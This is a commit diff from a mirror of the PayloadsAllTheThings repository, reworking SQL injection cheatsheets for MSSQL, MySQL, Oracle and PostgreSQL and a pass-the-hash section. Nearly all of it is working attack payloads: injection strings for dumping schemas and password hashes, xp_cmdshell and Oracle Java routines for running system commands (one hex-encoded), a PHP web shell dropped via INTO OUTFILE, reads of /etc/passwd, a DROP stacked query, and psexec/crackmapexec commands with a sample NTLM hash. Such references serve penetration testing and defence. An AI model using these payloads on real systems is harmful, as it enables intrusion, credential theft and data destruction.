mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
SQL Cheatsheets - Refactoring part 1
This commit is contained in:
parent
81eebeaea2
commit
f1cb7ce50e
@ -22,7 +22,7 @@
|
|||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
* [Impacket](https://github.com/CoreSecurity/impacket)
|
* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows)
|
||||||
* [Responder](https://github.com/SpiderLabs/Responder)
|
* [Responder](https://github.com/SpiderLabs/Responder)
|
||||||
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
|
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
|
||||||
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
* [Ranger](https://github.com/funkandwagnalls/ranger)
|
||||||
@ -157,18 +157,21 @@ https://room362.com/post/2016/kerberoast-pt1/
|
|||||||
```
|
```
|
||||||
|
|
||||||
### Pass-the-Hash
|
### Pass-the-Hash
|
||||||
Note: the password can be replaced by a hash to execute a `pass the hash` attack.
|
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
|
||||||
```c
|
```c
|
||||||
use exploit/windows/smb/psexec
|
use exploit/windows/smb/psexec
|
||||||
set RHOST 10.2.0.3
|
set RHOST 10.2.0.3
|
||||||
set SMBUser jarrieta
|
set SMBUser jarrieta
|
||||||
set SMBPass nastyCutt3r
|
set SMBPass nastyCutt3r
|
||||||
|
// NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||||||
|
// NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||||||
set PAYLOAD windows/meterpreter/bind_tcp
|
set PAYLOAD windows/meterpreter/bind_tcp
|
||||||
run
|
run
|
||||||
shell
|
shell
|
||||||
|
|
||||||
or with crackmapexec
|
or with crackmapexec
|
||||||
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
||||||
|
also works with net range : cme smb 10.2.0.2/24 ...
|
||||||
|
|
||||||
or with psexec
|
or with psexec
|
||||||
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
||||||
|
@ -1,23 +1,23 @@
|
|||||||
# MSSQL Injection
|
# MSSQL Injection
|
||||||
|
|
||||||
## MSSQL version
|
## MSSQL version
|
||||||
```
|
```sql
|
||||||
SELECT @@version
|
SELECT @@version
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL database name
|
## MSSQL database name
|
||||||
```
|
```sql
|
||||||
SELECT DB_NAME()
|
SELECT DB_NAME()
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Databases
|
## MSSQL List Databases
|
||||||
```
|
```sql
|
||||||
SELECT name FROM master..sysdatabases;
|
SELECT name FROM master..sysdatabases;
|
||||||
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
SELECT DB_NAME(N); — for N = 0, 1, 2, …
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Column
|
## MSSQL List Column
|
||||||
```
|
```sql
|
||||||
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
|
||||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
||||||
|
|
||||||
@ -25,7 +25,7 @@ SELECT table_catalog, column_name FROM information_schema.columns
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL List Tables
|
## MSSQL List Tables
|
||||||
```
|
```sql
|
||||||
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
|
||||||
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
|
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
|
||||||
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
|
||||||
@ -35,7 +35,7 @@ SELECT table_catalog, table_name FROM information_schema.columns
|
|||||||
|
|
||||||
|
|
||||||
## MSSQL User Password
|
## MSSQL User Password
|
||||||
```
|
```sql
|
||||||
MSSQL 2000:
|
MSSQL 2000:
|
||||||
SELECT name, password FROM master..sysxlogins
|
SELECT name, password FROM master..sysxlogins
|
||||||
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
|
||||||
@ -46,7 +46,7 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Error based
|
## MSSQL Error based
|
||||||
```
|
```sql
|
||||||
For integer inputs : convert(int,@@version)
|
For integer inputs : convert(int,@@version)
|
||||||
For integer inputs : cast((SELECT @@version) as int)
|
For integer inputs : cast((SELECT @@version) as int)
|
||||||
|
|
||||||
@ -56,7 +56,7 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
|
|||||||
|
|
||||||
|
|
||||||
## MSSQL Blind based
|
## MSSQL Blind based
|
||||||
```
|
```sql
|
||||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||||
|
|
||||||
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
||||||
@ -64,22 +64,30 @@ SELECT message FROM data WHERE row = 1 and message like 't%'
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Time based
|
## MSSQL Time based
|
||||||
```
|
```sql
|
||||||
ProductID=1;waitfor delay '0:0:10'--
|
ProductID=1;waitfor delay '0:0:10'--
|
||||||
ProductID=1);waitfor delay '0:0:10'--
|
ProductID=1);waitfor delay '0:0:10'--
|
||||||
ProductID=1';waitfor delay '0:0:10'--
|
ProductID=1';waitfor delay '0:0:10'--
|
||||||
ProductID=1');waitfor delay '0:0:10'--
|
ProductID=1');waitfor delay '0:0:10'--
|
||||||
ProductID=1));waitfor delay '0:0:10'--
|
ProductID=1));waitfor delay '0:0:10'--
|
||||||
|
|
||||||
|
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
|
||||||
|
```
|
||||||
|
|
||||||
|
## MSSQL Stacked Query
|
||||||
|
Use a semi-colon ";" to add another query
|
||||||
|
```sql
|
||||||
|
ProductID=1; DROP members--
|
||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Command execution
|
## MSSQL Command execution
|
||||||
```
|
```sql
|
||||||
EXEC xp_cmdshell "net user";
|
EXEC xp_cmdshell "net user";
|
||||||
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
|
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
|
||||||
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
|
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
|
||||||
```
|
```
|
||||||
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
|
||||||
```
|
```sql
|
||||||
EXEC sp_configure 'show advanced options',1
|
EXEC sp_configure 'show advanced options',1
|
||||||
RECONFIGURE
|
RECONFIGURE
|
||||||
EXEC sp_configure 'xp_cmdshell',1
|
EXEC sp_configure 'xp_cmdshell',1
|
||||||
@ -87,7 +95,7 @@ RECONFIGURE
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MSSQL Make user DBA (DB admin)
|
## MSSQL Make user DBA (DB admin)
|
||||||
```
|
```sql
|
||||||
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -1,8 +1,16 @@
|
|||||||
# MYSQL Injection
|
# MYSQL Injection
|
||||||
|
|
||||||
|
## MySQL Comment
|
||||||
|
```sql
|
||||||
|
# MYSQL Comment
|
||||||
|
/* MYSQL Comment */
|
||||||
|
/*! MYSQL Special SQL */
|
||||||
|
/*!32302 10*/ Comment for MySQL version 3.23.02
|
||||||
|
```
|
||||||
|
|
||||||
## Detect columns number
|
## Detect columns number
|
||||||
Using a simple ORDER
|
Using a simple ORDER
|
||||||
```
|
```sql
|
||||||
order by 1
|
order by 1
|
||||||
order by 2
|
order by 2
|
||||||
order by 3
|
order by 3
|
||||||
@ -11,7 +19,7 @@ order by XXX
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MySQL Union Based
|
## MySQL Union Based
|
||||||
```
|
```sql
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||||
@ -19,13 +27,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MySQL Error Based - Basic
|
## MySQL Error Based - Basic
|
||||||
```
|
```sql
|
||||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Error Based - UpdateXML function
|
## MYSQL Error Based - UpdateXML function
|
||||||
```
|
```sql
|
||||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
||||||
@ -34,13 +42,13 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
|
|||||||
```
|
```
|
||||||
|
|
||||||
Shorter to read:
|
Shorter to read:
|
||||||
```
|
```sql
|
||||||
' and updatexml(null,concat(0x0a,version()),null)-- -
|
' and updatexml(null,concat(0x0a,version()),null)-- -
|
||||||
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Error Based - Extractvalue function
|
## MYSQL Error Based - Extractvalue function
|
||||||
```
|
```sql
|
||||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||||
@ -50,21 +58,21 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
|
|||||||
|
|
||||||
## MYSQL Blind using a conditional statement
|
## MYSQL Blind using a conditional statement
|
||||||
TRUE: `if @@version starts with a 5`:
|
TRUE: `if @@version starts with a 5`:
|
||||||
```
|
```sql
|
||||||
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||||
Response:
|
Response:
|
||||||
HTTP/1.1 500 Internal Server Error
|
HTTP/1.1 500 Internal Server Error
|
||||||
```
|
```
|
||||||
|
|
||||||
False: `if @@version starts with a 4`:
|
False: `if @@version starts with a 4`:
|
||||||
```
|
```sql
|
||||||
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
|
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
|
||||||
Response:
|
Response:
|
||||||
HTTP/1.1 200 OK
|
HTTP/1.1 200 OK
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Blind with MAKE_SET
|
## MYSQL Blind with MAKE_SET
|
||||||
```
|
```sql
|
||||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||||
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||||
@ -72,26 +80,30 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL Time Based
|
## MYSQL Time Based
|
||||||
```
|
```sql
|
||||||
+BENCHMARK(40000000,SHA1(1337))+
|
+BENCHMARK(40000000,SHA1(1337))+
|
||||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||||
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
|
||||||
|
|
||||||
|
AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1
|
||||||
|
RLIKE SLEEP([SLEEPTIME])
|
||||||
|
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## MYSQL Read content of a file
|
## MYSQL Read content of a file
|
||||||
```
|
```sql
|
||||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||||
```
|
```
|
||||||
|
|
||||||
## MySQL DIOS - Dump in One Shot
|
## MySQL DIOS - Dump in One Shot
|
||||||
```
|
```sql
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||||
```
|
```
|
||||||
|
|
||||||
## MYSQL DROP SHELL
|
## MYSQL DROP SHELL
|
||||||
```
|
```sql
|
||||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||||
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
# Oracle SQL Injection
|
# Oracle SQL Injection
|
||||||
|
|
||||||
## Oracle SQL version
|
## Oracle SQL version
|
||||||
```
|
```sql
|
||||||
SELECT user FROM dual UNION SELECT * FROM v$version
|
SELECT user FROM dual UNION SELECT * FROM v$version
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL database name
|
## Oracle SQL database name
|
||||||
```
|
```sql
|
||||||
SELECT global_name FROM global_name;
|
SELECT global_name FROM global_name;
|
||||||
SELECT name FROM V$DATABASE;
|
SELECT name FROM V$DATABASE;
|
||||||
SELECT instance_name FROM V$INSTANCE;
|
SELECT instance_name FROM V$INSTANCE;
|
||||||
@ -14,18 +14,18 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
|||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Databases
|
## Oracle SQL List Databases
|
||||||
```
|
```sql
|
||||||
SELECT DISTINCT owner FROM all_tables;
|
SELECT DISTINCT owner FROM all_tables;
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Column
|
## Oracle SQL List Column
|
||||||
```
|
```sql
|
||||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
|
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
|
||||||
```
|
```
|
||||||
|
|
||||||
## Oracle SQL List Tables
|
## Oracle SQL List Tables
|
||||||
```
|
```sql
|
||||||
SELECT table_name FROM all_tables;
|
SELECT table_name FROM all_tables;
|
||||||
SELECT owner, table_name FROM all_tables;
|
SELECT owner, table_name FROM all_tables;
|
||||||
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||||
@ -52,10 +52,13 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
|||||||
| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
|
| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
|
||||||
| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
|
| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
|
||||||
|
|
||||||
|
## Oracle SQL Time based
|
||||||
|
```sql
|
||||||
|
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
|
||||||
|
```
|
||||||
|
|
||||||
## Oracle SQL Command execution
|
## Oracle SQL Command execution
|
||||||
```
|
```sql
|
||||||
/* create Java class */
|
/* create Java class */
|
||||||
BEGIN
|
BEGIN
|
||||||
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
|
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
|
||||||
@ -72,7 +75,7 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
|||||||
```
|
```
|
||||||
or (hex encoded)
|
or (hex encoded)
|
||||||
|
|
||||||
```
|
```sql
|
||||||
/* create Java class */
|
/* create Java class */
|
||||||
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
|
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
|
||||||
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
|
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
|
||||||
|
@ -1,9 +1,21 @@
|
|||||||
# POSTGRESQL
|
# POSTGRESQL
|
||||||
|
|
||||||
##PostgreSQL Error Based - Basic
|
## PostgreSQL Comment
|
||||||
|
```
|
||||||
|
--
|
||||||
|
/**/
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Error Based - Basic
|
||||||
```
|
```
|
||||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||||
|
```
|
||||||
|
|
||||||
|
## PostgreSQL Time Based
|
||||||
|
```
|
||||||
|
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||||
|
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||||
```
|
```
|
@ -1,11 +1,20 @@
|
|||||||
# SQL injection
|
# SQL injection
|
||||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
* [Entry point detection](#)
|
||||||
|
* [DBMS Identification](#)
|
||||||
|
* [SQL injection using SQLmap](#)
|
||||||
|
* [Authentication bypass](#)
|
||||||
|
* [Polyglot injection](#)
|
||||||
|
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
|
||||||
|
* [WAF Bypass](#)
|
||||||
|
|
||||||
|
|
||||||
## Entry point detection
|
## Entry point detection
|
||||||
Detection of an SQL injection entry point
|
Detection of an SQL injection entry point
|
||||||
Simple characters
|
Simple characters
|
||||||
```
|
```sql
|
||||||
'
|
'
|
||||||
%27
|
%27
|
||||||
"
|
"
|
||||||
@ -19,13 +28,13 @@ Wildcard (*)
|
|||||||
```
|
```
|
||||||
|
|
||||||
Multiple encoding
|
Multiple encoding
|
||||||
```
|
```sql
|
||||||
%%2727
|
%%2727
|
||||||
%25%27
|
%25%27
|
||||||
```
|
```
|
||||||
|
|
||||||
Merging characters
|
Merging characters
|
||||||
```
|
```sql
|
||||||
`+HERP
|
`+HERP
|
||||||
'||'DERP
|
'||'DERP
|
||||||
'+'herp
|
'+'herp
|
||||||
@ -51,7 +60,7 @@ transformed into U+0027 APOSTROPHE (')
|
|||||||
```
|
```
|
||||||
|
|
||||||
## DBMS Identification
|
## DBMS Identification
|
||||||
```
|
```c
|
||||||
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
|
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
|
||||||
["connection_id()=connection_id()" ,"MYSQL"],
|
["connection_id()=connection_id()" ,"MYSQL"],
|
||||||
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
|
